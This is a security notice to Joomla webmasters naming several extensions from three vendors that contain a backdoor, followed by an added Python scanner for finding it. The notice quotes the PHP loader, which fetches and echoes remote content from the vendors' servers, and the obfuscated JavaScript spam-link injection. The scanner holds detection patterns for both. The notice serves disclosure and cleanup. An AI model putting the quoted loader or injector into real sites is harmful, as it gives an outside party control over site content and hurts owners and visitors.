This is a notice to all developers / webmasters. Check your site to see if you have any extensions installed from Autson.com AKA iNowWeb.com AKA Plimun.com (possibly more).
Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and can do whatever they like to your website. This is a huge security vulnerability.
The most popular vulnerable extensions are:
- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).
- Share This for Joomla! (mod_JoomlaShareThis)
The malicious code is located in mod_JoomlaShareThis.php.
- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.
- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.
- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).
The hidden backlinks are being inserted via the following code:
<?php
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>
or
<?php
$credit=file_get_contents('http://www.autson.com/p.php?i='.$path);
echo $credit;
?>
etc. The file on their server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the PHP file.
This is what that code is inserting into the site (THIS IS WHAT YOU NEED TO REMOVE FROM THE PHP FILES):
<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;)
{t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
<p class="dnn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
or
<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;)
{t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>
<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
Additional extensions from these developers that are possibly vulnerable as well:
iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)
Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show
Plimun.com:
- Plimun Twitter Ticker
- Twitter Show
So what can we do to stop these spammers/hackers?
Remove the extensions from your or your clients' websites (or just remove the malicious code).
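To find the loader and the injected markup described above across a whole site, a scanner like the following can be run over the Joomla directory. It is an added example, not part of the original notice: the function names (`scan_text`, `scan_tree`) and rule labels are made up here, and the patterns are heuristics built only from the samples and vendor domains quoted on this page.

```python
import re
from pathlib import Path

# Rules derived from the samples quoted on this page (heuristics, not signatures).
# 1. A variable assigned from file_get_contents('http://...' . $var)
REMOTE_FETCH = re.compile(
    r"""\$(\w+)\s*=\s*file_get_contents\s*\(\s*['"]\s*https?://[^'"]*['"]\s*\.\s*\$\w+""",
    re.IGNORECASE,
)
# 2. The vendor domains named in the notice
VENDOR_HOST = re.compile(r"\b(?:inowweb|autson|plimun)\.com\b", re.IGNORECASE)
# 3. The injected script's function name (dnnViewState, nemoViewState, ...)
VIEWSTATE_JS = re.compile(r"function\s+\w*ViewState\s*\(\s*\)", re.IGNORECASE)


def scan_text(text):
    """Return a sorted list of (line_number, rule) findings for one PHP source."""
    findings = set()
    for m in REMOTE_FETCH.finditer(text):
        line = text.count("\n", 0, m.start()) + 1
        var = re.escape(m.group(1))
        # The loader echoes the fetched body straight into the page.
        echoed = re.search(r"\b(?:echo|print)\s*\(?\s*\$" + var + r"\b", text[m.end():])
        findings.add((line, "remote-fetch-echoed" if echoed else "remote-fetch"))
    for rule, rx in (("vendor-host", VENDOR_HOST), ("viewstate-js", VIEWSTATE_JS)):
        for m in rx.finditer(text):
            findings.add((text.count("\n", 0, m.start()) + 1, rule))
    return sorted(findings)


def scan_tree(root):
    """Scan every .php file under root; return {relative_path: findings}."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report


if __name__ == "__main__":
    import sys
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for line, rule in hits:
            print(f"{name}:{line}: {rule}")
```

Run it with the site root as the only argument; each output line is `file:line: rule`, and any hit should be reviewed by hand before the file is edited or the extension removed.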